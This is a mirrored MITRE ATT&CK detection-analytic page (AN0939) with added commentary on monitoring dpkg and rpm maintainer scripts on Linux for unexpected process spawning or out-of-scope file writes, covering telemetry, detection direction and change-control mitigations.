AN0939: Analytic 0939

Detection of maintainer scripts (e.g., postinst, preinst) being modified or executed during dpkg or rpm operations. Watch for script content that spawns additional processes or writes outside package scope.

EnterpriseAN0939AnalyticObject v1.0 Modified Oct 21, 2025, 15:10 UTC (UTC+00:00)

This analytic is relevant to Linux software supply-chain and endpoint integrity risk: package maintainer scripts such as preinst and postinst can run during dpkg or rpm activity, so unexpected modification or execution behavior may indicate a package operation doing more than normal installation or upgrade work. For leaders, the decision value is whether Linux package activity is visible enough for the SOC and IR teams to distinguish routine administration from suspicious process spawning or file writes outside the expected package scope.

Executive priority

Prioritize this where Linux systems support critical services, regulated workloads, build environments, or administrative infrastructure. The business question is not simply whether dpkg or rpm exists, but whether package-management activity is logged, attributable, and reviewable during incidents or audits. This can support operational resilience, change-control evidence, and incident triage when unexpected software changes coincide with service disruption or integrity concerns.

Technical view

Validate monitoring for Linux package manager operations involving dpkg and rpm, with attention to maintainer scripts such as preinst and postinst. Since ATT&CK does not provide a separate detection body for this analytic and no tactic relationships are supplied, teams should focus on the description: detect maintainer script modification or execution during package operations, then inspect script content or child behavior for additional process spawning or writes outside the package’s expected scope. Baseline legitimate package installation, upgrade, and removal activity to reduce noise from normal administrative workflows.

Likely telemetry

Linux process execution telemetry for dpkg, rpm, package helper processes, shell interpreters, and child processes spawned during package operations
File creation and modification telemetry for package maintainer scripts such as preinst and postinst
File write telemetry showing paths written during package operations, especially writes outside expected package scope
Package management logs from dpkg and rpm where available
User, privilege, host, and change-window context for package installation or upgrade activity

Detection direction

Confirm that Linux endpoint telemetry captures parent-child process relationships during dpkg and rpm operations.
Tune for maintainer scripts that spawn additional processes, especially shells or utilities not normally associated with the package workflow.
Compare file writes during package operations against expected package scope to identify unusual destinations.
Correlate alerts with authorized change windows, package management logs, and administrative identities to reduce false positives from legitimate maintenance.
Treat lack of script content visibility, missing process lineage, or incomplete file-write telemetry as material blind spots for this analytic.

Mitigation priorities

Maintain disciplined Linux package change control so package operations can be tied to approved maintenance activity.
Restrict package installation and upgrade privileges to authorized administrators and managed automation accounts.
Preserve package manager logs and endpoint telemetry long enough to support incident response and compliance evidence.
Review monitoring coverage on critical Linux servers first, especially systems where unauthorized software change would affect business continuity.
Use IR playbooks that include package-operation review, maintainer script inspection, and validation of unexpected child processes or out-of-scope file writes.

Analyst notes and limits

This object is a detection analytic, not a technique. It is scoped to Linux and specifically references dpkg/rpm maintainer scripts. No ATT&CK tactics, relationships, aliases, or official detection logic were supplied, so the take focuses on validation and evidence classes rather than a specific rule implementation.

The supplied ATT&CK fields do not provide executable detection logic, data source mappings, related techniques, adversary use, impact, or attribution. Local baselines, package inventory, endpoint telemetry depth, and change-management records are required to determine whether observed behavior is suspicious.

Official MITRE ATT&CK definition

Analytic 0939

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release: 19.1
Object version: 1.0
Created: Oct 21, 2025, 15:10 UTC (UTC+00:00)
Modified: Oct 21, 2025, 15:10 UTC (UTC+00:00)
Raw hash: 8831ba768208dc93...

Imported snapshots across ATT&CK releases (1)

Release	Bundle imported	Object version	Modified	Status	Raw hash
19.1	May 18, 2026, 07:08 UTC (UTC+00:00)	1.0	Oct 21, 2025, 15:10 UTC (UTC+00:00)	Current bundle	`8831ba768208…`

Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

[1]
mitre-attack AN0939
Open source URL

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use